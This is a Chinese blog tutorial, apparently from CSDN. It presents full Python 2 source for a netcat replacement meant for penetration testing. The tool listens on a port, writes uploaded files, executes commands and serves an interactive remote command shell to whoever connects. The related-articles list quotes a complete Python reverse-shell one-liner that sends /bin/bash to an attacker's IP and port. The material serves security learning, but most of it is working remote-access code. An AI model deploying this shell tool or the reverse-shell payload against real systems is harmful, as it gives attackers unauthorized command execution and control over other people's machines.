python连接netcat监听的端口_Python实现Netcat(文件上传 反弹shell)

最新推荐文章于 2022-12-22 19:58:23 发布
最新推荐文章于 2022-12-22 19:58:23 发布
阅读量231 收藏
点赞数
文章标签: python连接netcat监听的端口

在网络工具中有“瑞士军刀”美誉的NetCat和nc命令, 每个渗透人员的必修课,简单实用的功能用了N年仍爱不释手。 在渗透测试中,往往聪明的系统管理员都会从系统中移除nc。在这种情况下需要创建一个简单的客户端和服务器用来传递文件,或者执行命令。

功能

同时具备服务端和客户端功能 命令执行 文件传输

Xyntax Netcat Tool

usage: Netcat.py [-h] [-l] [-e EXECUTE] [-c] [-u UPLOAD] target port

positional arguments:

target target host IP

port target host Port

optional arguments:

-h, --help show this help message and exit

-l, --listen listen on [host]:[port] for incoming connections

-e EXECUTE, --execute EXECUTE

execute the given file upon receiving a connection

-c, --command initialize a command shell

-u UPLOAD, --upload UPLOAD

upon receiving connection upload a file and write to

[destination]

代码解析

导入包 声明变量

#!/usr/bin/env python2

# -*- coding: utf-8 -*-

import sys

import socket

import threading

import subprocess

import argparse

__author__ = 'xy'

# global vars

listen = False

command = False

upload = False

execute = ''

target = ''

upload_destination = ''

port = 0

获取用户输入

def parse_args():

parser = argparse.ArgumentParser()

# 可选项 不需要赋值 存储为bool

parser.add_argument(

"-l",

"--listen",

help="listen on [host]:[port] for incoming connections",

action='store_true'

)

# 可选项 需要赋值 存储为string

parser.add_argument(

"-e",

"--execute",

help="execute the given file upon receiving a connection"

)

parser.add_argument(

"-c",

"--command",

help="initialize a command shell",

action='store_true'

)

parser.add_argument(

"-u",

"--upload",

help="upon receiving connection upload a file and write to [destination]"

)

# 必需项 需要赋值

parser.add_argument(

"target",

help="target host IP"

)

parser.add_argument(

"port",

help="target host port"

)

return parser.parse_args()

主函数

变量声明、读取用户输入。

如果是客户端,则读取用户命令后调用client_sender()函数发送命令到服务端,并接收服务端的返回数据。

如果是服务端,则进入监听 server_loop()

def main():

global listen

global port

global execute

global command

global upload_destination

global target

print('Xyntax Netcat Tool')

args = parse_args()

if args.listen:

listen = True

if args.command:

command = True

if args.execute:

execute = args.execute

if args.upload:

upload_destination = args.upload

target = args.target

port = int(args.port)

if not listen and len(target) and port > 0:

# 从命令行读取数据

# 这里将阻塞 所以不向标准输入发送数据时发送ctrl-d

buffer = sys.stdin.read()

# 发送数据

client_sender(buffer)

# 开始监听并准备上传文件、执行命令

# 放置一个反弹shell

# 取决于上面的命令行选项

if listen:

server_loop()

客户端函数

创建一个socket对象,连接主机端口,与主机进行通信。

def client_sender(buffer):

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

# 连接目标主机

client.connect((target, port))

if len(buffer):

client.send(buffer)

while True:

# 现在等待数据回传

recv_len = 1

response = ''

while recv_len:

data = client.recv(4096)

recv_len = len(data)

response += data

if recv_len < 4096:

break

print(response, )

# 等待更多输入

buffer = raw_input("")

buffer += '\n\n'

# 发送出去

client.send(buffer)

except:

print("[*] Exception! Exiting.")

client.close()

服务端函数

这里使用threading处理连接,使用subprocess执行命令

def server_loop():

global target

# 如果没有定义目标 那么我们监听端口

if not len(target):

target = '0.0.0.0'

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

server.bind((target, port))

server.listen(5)

while True:

client_socket, addr = server.accept()

# 分拆一个线程处理新的客户端

client_thread = threading.Thread(target=client_handler, args=(client_socket,))

client_thread.start()

def run_command(command):

# 换行

command = command.rstrip()

# 运行命令并将输出返回

try:

output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)

except:

output = 'Failed to execute command.\r\n'

# 将输出发送

return output

def client_handler(client_socket):

global upload

global execute

global command

# 检测上传文件

if len(upload_destination):

# 读取所有的字符并写下目标

file_buffer = ''

# 持续读取数量直到没有符合的数据

while True:

data = client_socket.recv(1024)

if not data:

break

else:

file_buffer += data

try:

file_descriptor = open(upload_destination, 'wb')

file_descriptor.write(file_buffer)

file_descriptor.close()

# 确认文件已经写出来

client_socket.send('Successfully saved file to %s\r\n' % upload_destination)

except:

client_socket.send('Failed to save file to %s\r\n' % upload_destination)

# 检查命令执行

if len(execute):

# 运行命令

output = run_command(execute)

client_socket.send(output)

# 如果需要一个命令行shell,那么我们进入另一个循环

if command:

while True:

# 跳出一个窗口

client_socket.send(' ')

# 现在我们接收文件直到发现换行符(enter key)

cmd_buffer = ''

while '\n' not in cmd_buffer:

cmd_buffer += client_socket.recv(1024)

# 返还命令输出

response = run_command(cmd_buffer)

# 返回响应数据

client_socket.send(response)

运行

weixin_39644021
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Netcat端口扫描、端口监听、远程文件
07-30
Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。 功能说明:端口扫描、端口监听、远程文件
python实现nc_python编写nc的思考
weixin_39651325的博客
12-05 707
0x00 前言发现自己学习python已经有半个月了,也开发了自己的一些渗透的小脚本,但觉得还是不够,我个人觉得工具和脚本还有框架是个本质上的区别。脚本的话,不会考虑到其他的一些因素,例如报错和交互性。要是有的话可能还要在工具里面修改到一些参数,然后才能进行使用。简单点来过脚本给我的概念就是编写出来能用就行。而工具具有的是一些交互性让对方输入自己想要的命令或者说参数,然后执行不需要频繁改代码再使用...
python写一个NC(八)
路虽远,行将至。事虽难,做必达。
02-19 1694
基于TCP连接的远程控制木马 一、subprocess模块 subprocess模块允许我们启动一个新进程,并连接至它们的标准输入/输出/错误管道,从而获取返回值。 二、argparse模块 argparse是python用于解析命令行参数和选项的标准模块,作用相当于是解析命令行参数。 基本用法步骤 import argparse #导入模块 parse = argparse.ArgumentParser() #创建解析对象 parse.add...
python-读写nc文件并输出json
weixin_44855451的博客
11-28 1499
python -读写nc文件并转json
python重写nc功能
小千安全
12-22 228
使用python写出客户端和服务端的通讯源码
使用python反弹shell
noner_n的博客
05-05 2943
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" 使用python进行反弹shell,IP改成攻击机ip,端口随意,没有
python取代netcat过程分析
12-23
网络上的两个程序通过一个双向的通信连接实现数据的交换,这个连接的一端称为一个socket。建立网络通信连接至少要一对端口号(socket)。socket本质是编程接口(API),对TCP/IP的封装,TCP/IP也要提供可供程序员做网络...
浅谈Python黑帽子取代netcat
09-20
本篇文章通过一个小小实例给大家分析了Python黑帽子取代netcat的过程以及相关知识点,对此有兴趣的朋友可以学习下。
Reverse-Shell-Client:反向外壳客户端是netcat反向外壳侦听器的基于Python的替代方案
05-08
反向外壳客户端是netcat反向外壳侦听器( nc -lvp <port> )的基于Python的替代方案。 默认的反向Shell客户端( rsh-client.py )附带了许多功能,例如在您设法获得Shell的(基于Unix的)远程主机上上,下载,...
[Web安全]Python利用Socket反弹shell,多线程反弹Shell
_DESpiSED的博客
09-22 1977
本文详细介绍了Python利用套接字编程反弹shell和多线程反弹shell的过程,给网络安全初学者提供一定思路。
【读书笔记】Python黑帽子黑客与渗透测试编程之道(一)
tpriwwq的专栏
08-04 697
Python黑帽子Python3版本代码
内网转发——反弹端口
cxrpty的博客
03-17 3831
反弹端口:是指受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发 主要指以下情况: -1.访问服务器的3389端口,由于防火墙的原因,我们访问不了3389端口 原因:1.3389端口,防火墙没有开放 2.服务器处于公司内网,对外只发布了80端口 3.3389...
python实现netcat(文件输、反弹shell)
乐枕的家
10-17 7264
介绍 在网络工具中有“瑞士军刀”美誉的NetCat和nc命令, 每个渗透人员的必修课,简单实用的功能用了N年仍爱不释手。 在渗透测试中,往往聪明的系统管理员都会从系统中移除nc。在这种情况下需要创建一个简单的客户端和服务器用来文件,或者执行命令。 功能同时具备服务端和客户端功能 命令执行 文件输Xyntax Netcat Tool usage: Netcat.py [-h] [-l] [-
python连接netcat监听端口_[分享]用python实现简单的netcat
weixin_34891129的博客
02-04 252
这几天再看python黑帽,顺手把上面的代码实现一遍。分享下心得了~大致的代码和书上的一样,不过书上的代码有点问题。我折腾了很久,在client_handler的if len(upload_destination)函数中如果使用书上的代码,会发现它停留在while循环里面出不来了,所以我稍微改了下。但是遗憾的是,这个自制的netcat不能文件,而且那个输command的命令我也觉得很鸡肋,都能...
python连接netcat监听端口_如何使Netcat显示p的有效载荷
weixin_30653101的博客
02-04 107
TCP是基于会话的。要进行通信的计算机必须首先彼此同步(设置会话)。在这个过程被称为三方握手,使用以下步骤:SYN、SYN-ACK、ACK。在1.) Machine A ====SYN====> Machine B (Machines A, running scapy, tries to synch with B, running netcat)2.) Machine B ==SYN-ACK...
python实现netcat
qq_43550748的博客
10-09 915
#!/usr/bin/python2 import sys import socket import getopt import thread import subprocess listen =False command =False upload =False execute ="" tar...
python连接netcat监听端口_netcat使用
weixin_39754915的博客
12-05 775
前言最近在做渗透测试的时候遇到了端口监听shell反弹问题,在这个过程中自己对Netcat这一款神器有了新的认识,现将一些Netcat的用法做一个小总结,希望对各位有帮助!Netcat简介Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听端口扫描、远程文件输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话来描述NC的...
python连接netcat监听端口_python 实现 netcat
weixin_39943586的博客
12-05 81
importsysimportsocketimportgetoptimportthreadingimportsubprocesslisten=Falsecommand=Falseupload=Falseexecute=""target=""upload_destination=""port=0defusage():print"BHPNetTool"pr...
python学习系列(2) ——socket 端口连接
Yumishiny的博客
05-17 1058
python学习系列(2) ——socket 端口连接 #!/usr/bin/env python import socket def get_ip_status(ip,port): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: server.connect((ip,port)) print(’{0} port {1...
使用python实现netcat
最新发布
03-28
以下是Python实现Netcat的样例代码: ```python import argparse import socket import threading import subprocess def send_recv(sock): while True: data = sock.recv(1024) if not data: break sock....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值